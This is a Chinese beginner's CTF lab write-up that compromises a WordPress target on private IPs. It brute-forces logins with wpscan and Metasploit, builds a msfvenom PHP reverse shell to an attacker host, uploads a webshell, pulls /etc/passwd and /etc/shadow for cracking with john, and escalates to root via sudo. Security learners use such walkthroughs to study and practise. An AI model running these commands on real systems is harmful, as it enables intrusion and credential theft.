小白學習CTF第十二天-web安全暴力破解

bbhh1139發表於2020-04-29

web安全暴力破解

在這裡插入圖片描述
在這裡插入圖片描述

資訊探測

資訊探測與之前的探測策略一樣
在這裡插入圖片描述

深入挖掘

在這裡插入圖片描述
在這裡插入圖片描述

http://192.168.56.103/secret/

在這裡插入圖片描述

http://192.168.56.103/secret/wp-login.php

在這裡插入圖片描述
但是發現站點登入不上去,怎麼辦呢?
在這裡插入圖片描述
打不開的網頁可以設定對應的站點,通過把相應的站點改為IP地址即可
gedit /etc/hosts
靶場IP 無法登入的站點
解析一下網頁結構
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述
之後就可以再次登陸了。
在這裡插入圖片描述

暴力破解

在這裡插入圖片描述
首先要檢視使用者名稱

wpscan

在這裡插入圖片描述

wpscan --url www.vtcsec.com/secret/ --enumerate u

在這裡插入圖片描述
得到了使用者名稱以及密碼了。
之後啟動msfconsole

msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set rhosts 
set pass_file /usr/share/wordlists/dirb/common.txt
set user admin
set targeturi /secret/
set rhosts IP
set username admin
run

在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述

上傳webshell獲取控制權

在這裡插入圖片描述
在這裡插入圖片描述
製作一個對應的shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.17.128 lport=4444 -f raw

在這裡插入圖片描述

back
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.253.12
run

在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述
run 之後像之前對應的網頁上傳webshell,等待反彈許可權,這裡就不介紹了。

http://192.168.253.20/secret/wp-content/themes/twentysevevteen/404.php
sysinfo
id

在這裡插入圖片描述

root許可權

在這裡插入圖片描述
下載passwd以及shadow

download /etc/passwd    
download /etc/shadow

unshadow passwd shadow > cracked
john cracked

在這裡插入圖片描述
之後破解對應的使用者名稱以及密碼。
在這裡插入圖片描述
記得優化終端。

python -c "import pty;pty.spawn('/bin/bash')"

在這裡插入圖片描述
之後準備獲取root許可權。
在這裡插入圖片描述
但是這裡並沒有獲取root許可權,只是一個比普通使用者許可權,我們使用。

su - marlinspike
sudo -l
sudo bash

在這裡插入圖片描述
返回root許可權了。
在這裡插入圖片描述

獲取flag

在這裡插入圖片描述
在這裡插入圖片描述

總結

在這裡插入圖片描述

相關文章